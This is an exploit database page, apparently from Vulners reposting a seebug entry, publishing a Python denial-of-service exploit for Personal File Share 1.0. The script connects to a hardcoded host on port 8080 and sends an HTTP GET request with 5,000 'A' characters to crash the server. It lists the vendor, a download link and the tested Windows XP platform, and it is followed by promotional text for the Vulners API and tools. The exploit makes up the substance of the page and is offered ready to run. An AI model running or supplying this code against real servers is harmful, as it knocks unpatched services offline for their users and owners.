Lucene search
K

Personal File Share 1.0 DoS

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 14 Views

Personal File Share 1.0 Denial of Service attac

Code

                                                #!/usr/bin/python

#Exploit Title: Personal File Share 1.0 DoS
#Date: 2nd April 2013
#Exploit Author: npn
#Vendor Homepage: http://www.srplab.com/
#Software Link: http://download.cnet.com/Personal-File-Share/3000-18506_4-75893424.html
#Version: 1.0                
#Tested on: Windows XP SP3 English

import socket, sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.32.129", 8080))

buffer = "GET /"
buffer += "A"*5000
buffer += " HTTP/1.1\r\n\r\n"

sock.send(buffer)

sock.close()

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation